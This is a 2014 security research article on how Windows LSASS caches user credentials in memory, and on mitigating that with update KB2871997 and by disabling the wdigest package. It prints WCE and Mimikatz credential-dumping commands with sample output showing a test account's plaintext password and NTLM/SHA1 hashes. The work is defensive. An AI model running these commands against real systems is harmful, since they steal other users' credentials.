

Windows Passwords - A Well Known Secret?

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Keywords: Complexity, GitHub, HTTP, Microsoft, Mimikatz, North, Password, Policy, Research, Single Sign On

1. Preface

This paper was written in 2014 as part of a research project at scip AG, Switzerland. It was initially published online at <https://www.scip.ch/en/?labs.20140710> and is available in English and German. Providing our clients with innovative research for the information technology of the future is an essential part of our company culture.

2. Introduction

The choice of a secure password is a central aspect of IT Security and has been keeping users and administrators busy and on their toes for years now. Each year, the requirements that a secure password must fulfil get higher and higher. Similarly, the requirements to crack a password rise. It's an eternal sort of arms race, if you want to call it that. Not only are length and complexity of the password of the utmost importance, but the one key factor is this: It should be secret. Therefore, passwords shouldn't be written down anywhere and or saved anywhere in plaintext. In this Labs, we'll look at the way Windows deals with passwords.

3. Windows and the Caching of Passwords

The *Local Security Authority (LSA)* is a protected subsystem of the operating system that treats all aspects of the local system security (*Local Security Policy*) and provides a multitude of authentication services that are referred to as *Security Packages*. When Windows boots up, the process *Local Security Authority Subsystem* boots as *lsass.exe*. It validates access rights for objects, checks the privileges of all users and generates security-relevant log entries.

A user signs on with the entry of his username and password. After this, all files and functions he is cleared for are accessible without having to enter credentials anymore. This concept is referred to as *Single Sign On* and is implemented in Windows with LSASS. LSASS supports *Kerberos* (*kerberos.dll*), *NTLM* (*msv1_0.dll*) or *Digest Authentication* (*wdigest.dll*). After a user's authentication, his credentials are stored in the memory of the system. This is done so that the security packages can access it. Depending on the package, the password is stored as a hash value, encrypted or even in plaintext.

In a presentation at *TechEd 2014* [1] *Nathan Ide* and *Mark Russinovich* of Microsoft showed the following overview

of reusable credentials during an active session. It shows which security packages cache credentials in the memory.

Re-Usable Credentials (During Logon Session)

		Kerb		Hashes		Plaintext-Equivalent Passwords			
		TGT	LM	NT	Tspkg	Wdigest	Kerb	LiveSSP	3rd Party SSP
Windows 8.0 and previous	Microsoft Account								
	Local Account								
	Domain Account								
Windows 8.1 Defaults	Microsoft Account				*	*			
	Local Account				*	*			
	Domain Account				*	*			
Windows 8.1 Features	Protected Users								
	Restricted Admin RDP								

* Off by Default

Based on a table by Benjamin Delpy
twitter.com/gentilkiwi/status/352557093640892416/photo/1

Green: No Password Data in Memory
Red: Password Data in Memory

Figure: Overview of the re-usable credentials

4. Extracting Passwords

Access to these credentials is managed by the LSASS process. Further, *local admin rights* are required. With those two prerequisites intact, interaction with a process can take place. If an attacker has admin rights, he can access those credentials. The attacker can thus access the plaintext passwords of all users that are signed onto the local system. In order to do that, there are several tools that specialize in just that. Among others, these are *Windows Credentials Editor* [2] made by Hernan Ochoa or *Mimikatz* [3] by security researcher and developer *Benjamin Delpy* [4]. Both tools have been tested on a Windows 7 SP1 x64 system (not a member of any domain) and they were able to read the credentials of the user admin.

WCE prior to the installation of KB2871997:

```
PS C:\> .\wce.exe -w
WCE v1.42beta (X64) (Windows Credentials
Editor) - © 2010-2013 Amplia Security - by
Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
```

```
admin\W07-TEST:c8bSG3RyAEx5mS
foobar\W07-TEST:P@ssw0rd
```

Mimikatz 2.0 Alpha 2010414 prior to the installation of KB2871997:

```
PS C:\> .\mimikatz.exe
```

```
.#####. mimikatz 2.0 alpha (x64) release
"Kiwi en C" (Apr 14 2014 16:34:31)
.## ^ ##.
## / \ ## /* * *
```



```

.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` (
benjamin@gentilkiwi.com )
'## v ##'
http://blog.gentilkiwi.com/mimikatz
(oe.eo)
'#####'
with 14 modules * * */

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 378416
(00000000:0005c630)
Session : Interactive from 0
User Name : admin
Domain : W07-TEST
SID : S-1-5-21-259468869-
2295567178-1167388315-1000
msv :
[00000003] Primary
* Username : admin
* Domain : W07-TEST
* NTLM :
d79f3c68f2c83654c3cf6b44f2be5cd0 :
* SHA1 :
bf49263e220f1fce85ff2dfc2d2ef05867759beb :
[00010000] CredentialKeys
* NTLM :
d79f3c68f2c83654c3cf6b44f2be5cd0 :
* SHA1 :
bf49263e220f1fce85ff2dfc2d2ef05867759beb
tspkg :
wdigest :
* Username : admin
* Domain : W07-TEST
* Password : c8bSG3RyAEx5mS
kerberos :
* Username : admin
* Domain : W07-TEST
* Password : (null)
ssp :
credman :

```

After installing the update the plaintext password stored in the package Kerberos couldn't be read anymore. All we got was (null). *Digest Authentication* still stores passwords in plaintext, though. Therefore, it is still possible to read out passwords in plaintext after the installation of the update.

6. Digest Authentication

Digest Authentication [8] was first implemented in Windows XP as a development for the authentication via *Hypertext Transfer Protocol (HTTP)* and the *Simple Authentication Security Layer (SASL)*. The package has been activated up until and including Windows 8. In Windows 8.1, the package was deactivated by default.

If digest authentication is not being used, the package wdigest should be disabled due to security reasons. Packages are handled in the registry at HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages. Deleting the package wdigest from the list will deactivate it after a reboot. After successfully disabling wdigest Mimikatz and WCE were run again.

Figure: WCE after deactivating wdigest

Mimikatz after deactivating wdigest:

```

PS C:\> .\mimikatz.exe

#####. mimikatz 2.0 alpha (x64) release
"Kiwi en C" (May 14 2014 01:43:00)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` (
benjamin@gentilkiwi.com )
'## v ##'
http://blog.gentilkiwi.com/mimikatz
(oe.eo)
'#####'
with 14 modules * * */

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 313007
(00000000:0004c6af)
Session : Interactive from 0
User Name : admin
Domain : W07-TEST
SID : S-1-5-21-259468869-
2295567178-1167388315-1000
msv :
[00000003] Primary
* Username : admin
* Domain : W07-TEST
* NTLM :
d79f3c68f2c83654c3cf6b44f2be5cd0 :
* SHA1 :
bf49263e220f1fce85ff2dfc2d2ef05867759beb :
[00010000] CredentialKeys
* NTLM :
d79f3c68f2c83654c3cf6b44f2be5cd0 :
* SHA1 :
bf49263e220f1fce85ff2dfc2d2ef05867759beb
tspkg :
kerberos :
* Username : admin
* Domain : W07-TEST
* Password : (null)
ssp :
credman :

```

The execution of WCE aborts by displaying an error message and Mimikatz can't read the password in plaintext anymore.

By installing update KB2871997 and by manually deactivating the Windows Authentication package, the vulnerability in the caching of passwords in plaintext under Windows 7 was mitigated successfully.

7. External Links

[1] <http://channel9.msdn.com/Events/TechEd/NorthAmerica/2014/DCIM-B359>

[2] <http://www.ampliasecurity.com/research/wcefaq.html>"
title="WCE"

[3] <https://github.com/gentilkiwi/mimikatz>

[4] <https://twitter.com/gentilkiwi/>

[5] <https://technet.microsoft.com/library/security/2871997>

[6] <https://support.microsoft.com/kb/2871997>

[7] <https://github.com/gentilkiwi/mimikatz/releases/tag/2.0.0-alpha-20140514>

[8] http://bit.ly/digest_authentication